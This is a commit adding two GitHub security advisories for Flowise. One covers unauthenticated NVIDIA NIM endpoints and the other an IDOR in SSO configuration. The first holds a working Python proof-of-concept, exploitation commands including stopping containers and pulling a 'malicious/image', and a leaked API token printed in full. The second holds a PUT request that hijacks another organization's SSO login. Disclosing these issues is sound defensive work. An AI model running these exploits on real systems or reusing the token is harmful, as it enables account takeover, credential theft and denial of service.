Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit f9bbaa35d0cf · 2026-03-06T22:23:35.000Z
GHSA-5f53-522j-j454 GHSA-cwc3-p92j-g7qm
diff --git a/advisories/github-reviewed/2026/03/GHSA-5f53-522j-j454/GHSA-5f53-522j-j454.json b/advisories/github-reviewed/2026/03/GHSA-5f53-522j-j454/GHSA-5f53-522j-j454.json
@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5f53-522j-j454",
+  "modified": "2026-03-06T22:21:38Z",
+  "published": "2026-03-06T22:21:38Z",
+  "aliases": [
+    "CVE-2026-30824"
+  ],
+  "summary": "Flowise Missing Authentication on NVIDIA NIM Endpoints",
+  "details": "# Missing Authentication on NVIDIA NIM Endpoints\n\n## Summary\n\nThe NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| CWE | CWE-306: Missing Authentication for Critical Function |\n| Affected File | `packages/server/src/utils/constants.ts` |\n| Affected Line | Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`) |\n| CVSS 3.1 | 8.6 (High) |\n\n## Root Cause\n\nIn `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist:\n\n```typescript\nexport const WHITELIST_URLS = [\n    // ... other URLs\n    '/api/v1/nvidia-nim',  // Line 20 - bypasses JWT/API-key validation\n    // ...\n]\n```\n\nThis causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks.\n\n## Affected Endpoints\n\n| Method | Endpoint | Risk |\n|--------|----------|------|\n| GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token |\n| GET | `/api/v1/nvidia-nim/preload` | Resource consumption |\n| GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption |\n| GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure |\n| POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull |\n| POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start |\n| POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service |\n| POST | `/api/v1/nvidia-nim/get-image` | Information disclosure |\n| POST | `/api/v1/nvidia-nim/get-container` | Information disclosure |\n\n## Impact\n\n### 1. NVIDIA API Token Leakage\n\nThe `/get-token` endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.\n\n**Token obtained:**\n```json\n{\n  \"access_token\": \"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\",\n  \"token_type\": \"Bearer\",\n  \"expires_in\": 3600\n}\n```\n\n**Token validation:**\n```bash\ncurl -H \"Authorization: Bearer nvapi-GT-...\" https://integrate.api.nvidia.com/v1/models\n# Returns list of 170+ available models\n```\n\n### 2. Container Runtime Manipulation\n\nOn systems with Docker/NIM installed, an unauthenticated attacker can:\n- List running containers (reconnaissance)\n- Stop containers (Denial of Service)\n- Start containers with arbitrary images\n- Pull arbitrary Docker images (resource consumption, potential malicious images)\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Privileged NVIDIA NIM endpoints are unauthenticated\n\nUsage:\n  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n\"\"\"\n\nimport argparse\nimport urllib.request\nimport urllib.error\n\ndef main():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--target\", required=True, help=\"Base URL, e.g. http://host:port\")\n    ap.add_argument(\"--path\", required=True, help=\"NIM endpoint path\")\n    ap.add_argument(\"--method\", default=\"GET\", choices=[\"GET\", \"POST\"])\n    ap.add_argument(\"--data\", default=\"\", help=\"Raw request body for POST\")\n    args = ap.parse_args()\n\n    url = args.target.rstrip(\"/\") + \"/\" + args.path.lstrip(\"/\")\n    body = args.data.encode(\"utf-8\") if args.method == \"POST\" else None\n    req = urllib.request.Request(\n        url,\n        data=body,\n        method=args.method,\n        headers={\"Content-Type\": \"application/json\"} if body else {},\n    )\n\n    try:\n        with urllib.request.urlopen(req, timeout=10) as r:\n            print(r.read().decode(\"utf-8\", errors=\"replace\"))\n    except urllib.error.HTTPError as e:\n        print(e.read().decode(\"utf-8\", errors=\"replace\"))\n\nif __name__ == \"__main__\":\n    main()\n```\n\n<img width=\"1581\" height=\"595\" alt=\"screenshot\" src=\"https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989\" />\n\n### Exploitation Steps\n\n```bash\n# 1. Obtain NVIDIA API token (no authentication required)\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n\n# 2. List running containers\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers\n\n# 3. Stop a container (DoS)\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \\\n  --method POST --data '{\"containerId\":\"<target_id>\"}'\n\n# 4. Pull arbitrary image\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \\\n  --method POST --data '{\"imageTag\":\"malicious/image\",\"apiKey\":\"any\"}'\n```\n\n### Evidence\n\n**Token retrieval without authentication:**\n```\n$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n{\"access_token\":\"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\",\"token_type\":\"Bearer\",\"refresh_token\":null,\"expires_in\":3600,\"id_token\":null}\n```\n\n**Token grants access to NVIDIA API:**\n```\n$ curl -H \"Authorization: Bearer nvapi-GT-...\" https://integrate.api.nvidia.com/v1/models\n{\"object\":\"list\",\"data\":[{\"id\":\"01-ai/yi-large\",...},{\"id\":\"meta/llama-3.1-405b-instruct\",...},...]}\n```\n\n**Container endpoints return 500 (not 401) proving auth bypass:**\n```\n$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers\n{\"statusCode\":500,\"success\":false,\"message\":\"Container runtime client not available\",\"stack\":{}}\n```\n\n## References\n\n- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)\n- [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "flowise"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.0.13"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 3.0.12"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/FlowiseAI/Flowise"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-306"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-06T22:21:38Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-cwc3-p92j-g7qm/GHSA-cwc3-p92j-g7qm.json b/advisories/github-reviewed/2026/03/GHSA-cwc3-p92j-g7qm/GHSA-cwc3-p92j-g7qm.json
@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-cwc3-p92j-g7qm",
+  "modified": "2026-03-06T22:20:50Z",
+  "published": "2026-03-06T22:20:50Z",
+  "aliases": [
+    "CVE-2026-30823"
+  ],
+  "summary": "Flowise has IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration",
+  "details": "### Summary\nThe Flowise platform has a critical Insecure Direct Object Reference (IDOR) vulnerability combined with a Business Logic Flaw in the PUT /api/v1/loginmethod endpoint.\n\nWhile the endpoint requires authentication, it fails to validate if the authenticated user has ownership or administrative rights over the target organizationId. This allows any low-privileged user (including \"Free\" plan users) to:\n\n1. Overwrite the SSO configuration of any other organization.\n2. Enable \"Enterprise-only\" features (SSO/SAML) without a license.\n3. Perform Account Takeover  by redirecting the authentication flow.\n\n### Details\nThe backend accepts the organizationId parameter from the JSON body and updates the database record corresponding to that ID. There is no middleware or logic check to ensure request.user.organizationId === body.organizationId.\n\n### PoC\nPrerequisites:\n1. The attacker creates a standard \"Free\" account and obtains a valid JWT token (Cookie/Header).\n2. The attacker identifies the target organizationId (e.g., bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d).\n\n**Step-by-Step Exploitation**: The attacker sends the following PUT request to overwrite the victim's Google SSO configuration.\n\n**Request**:\n\n```http\nPUT /api/v1/loginmethod HTTP/2\nHost: cloud.flowiseai.com\nCookie: token=<ATTACKER_JWT_TOKEN>\nContent-Type: application/json\nAccept: application/json\n\n{\n  \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n  \"userId\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\", \n  \"providers\": [\n    {\n      \"providerLabel\": \"Google\",\n      \"providerName\": \"google\",\n      \"config\": {\n        \"clientID\": \"ATTACKER_MALICIOUS_CLIENT_ID\",\n        \"clientSecret\": \"ATTACKER_MALICIOUS_SECRET\"\n      },\n      \"status\": \"enable\"\n    }\n  ]\n}\n```\n\n**Response**: The server responds with 200 OK, confirming the modification has been applied to the victim's organization context.\n\n```json\n{\n  \"status\": \"OK\",\n  \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\"\n}\n```\n\n### Impact\n\n- **Account Takeover**: An attacker can replace a victim organization's legitimate OAuth credentials (e.g., Google Client ID) with their own malicious application credentials. When victim employees try to log in via SSO, they are authenticated against the attacker's application, potentially allowing the attacker to hijack sessions or steal credentials.\n- **License Control Bypass**: Users on the \"Free\" tier can illicitly enable and configure SSO providers (Azure, Okta, etc.), which are features strictly restricted to the \"Enterprise\" plan.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "flowise"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.0.13"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 3.0.12"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/FlowiseAI/Flowise"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-639",
+      "CWE-862"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-06T22:20:50Z",
+    "nvd_published_at": null
+  }
+}
